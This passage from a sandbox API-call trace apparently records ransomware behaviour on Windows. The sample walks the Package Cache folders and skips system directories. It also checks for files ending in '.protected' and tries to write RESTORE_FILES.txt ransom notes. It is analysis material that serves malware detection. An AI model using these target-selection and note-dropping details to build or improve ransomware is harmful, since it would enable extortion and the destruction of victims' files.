pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned 96 [0093.324] lstrcmpW (lpString1="x64", lpString2=".") returned 1 [0093.324] lstrcmpW (lpString1="x64", lpString2="..") returned 1 [0093.324] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*") returned 98 [0093.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.324] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.324] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.324] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.324] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.324] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.324] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\.") returned 98 [0093.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.324] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.324] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.324] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.325] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.325] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.325] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.325] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\..") returned 99 [0093.325] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.325] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.325] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 114 [0093.325] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.325] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.325] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Windows") returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Program Files") returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Program Files (x86)") returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="$Recycle.bin") returned 1 [0093.325] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="System Volume Information") returned 1 [0093.325] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected") returned 135 [0093.325] StrStrIW (lpFirst="Windows6.1-KB2999226-x64.msu.protected", lpSrch=".protected") returned=".protected" [0093.325] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.325] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.325] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 114 [0093.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.325] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.325] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.325] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt") returned 110 [0093.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.325] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.325] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.326] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.326] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.326] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt") returned 104 [0093.326] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.326] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.326] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.326] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.326] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt") returned 104 [0093.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.327] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.327] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.327] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt") returned 95 [0093.327] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.327] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.327] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.327] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.327] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt") returned 95 [0093.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.328] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Windows") returned -1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Program Files") returned -1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="Program Files (x86)") returned -1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="$Recycle.bin") returned 1 [0093.328] lstrcmpiW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="System Volume Information") returned -1 [0093.328] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned 77 [0093.328] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2=".") returned 1 [0093.328] lstrcmpW (lpString1="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", lpString2="..") returned 1 [0093.328] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*") returned 79 [0093.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.328] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.328] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.328] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.328] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.328] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.328] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\.") returned 79 [0093.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.328] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.328] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.328] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.328] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.328] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.328] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.329] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\..") returned 80 [0093.329] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.329] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.329] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0093.329] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0093.329] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned 86 [0093.329] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.329] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.329] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*") returned 88 [0093.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.329] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.329] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.329] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.329] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.329] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.329] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\.") returned 88 [0093.329] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.329] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.330] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.330] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\..") returned 89 [0093.330] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.330] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.330] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="Windows") returned -1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="Program Files") returned -1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="Program Files (x86)") returned -1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="$Recycle.bin") returned 1 [0093.330] lstrcmpiW (lpString1="Patch", lpString2="System Volume Information") returned -1 [0093.330] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned 92 [0093.330] lstrcmpW (lpString1="Patch", lpString2=".") returned 1 [0093.330] lstrcmpW (lpString1="Patch", lpString2="..") returned 1 [0093.330] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*") returned 94 [0093.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.330] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.330] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.330] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.330] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.330] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.330] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\.") returned 94 [0093.330] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.330] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.330] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.331] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\..") returned 95 [0093.331] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.331] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.331] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.331] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt") returned 110 [0093.331] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.331] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.331] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="Windows") returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="Program Files") returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="Program Files (x86)") returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1="x64", lpString2="System Volume Information") returned 1 [0093.331] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned 96 [0093.331] lstrcmpW (lpString1="x64", lpString2=".") returned 1 [0093.331] lstrcmpW (lpString1="x64", lpString2="..") returned 1 [0093.331] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*") returned 98 [0093.331] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.331] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.331] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.331] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.331] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.331] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\.") returned 98 [0093.331] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.331] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.331] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.331] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.331] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.331] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.331] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\..") returned 99 [0093.332] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.332] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 114 [0093.332] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.332] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.332] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Windows") returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Program Files") returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="Program Files (x86)") returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="$Recycle.bin") returned 1 [0093.332] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu.protected", lpString2="System Volume Information") returned 1 [0093.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.protected") returned 135 [0093.332] StrStrIW (lpFirst="Windows6.1-KB2999226-x64.msu.protected", lpSrch=".protected") returned=".protected" [0093.332] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.332] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt") returned 114 [0093.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.332] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.332] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.332] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt") returned 110 [0093.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.332] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.332] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.332] wnsprintfW (in: 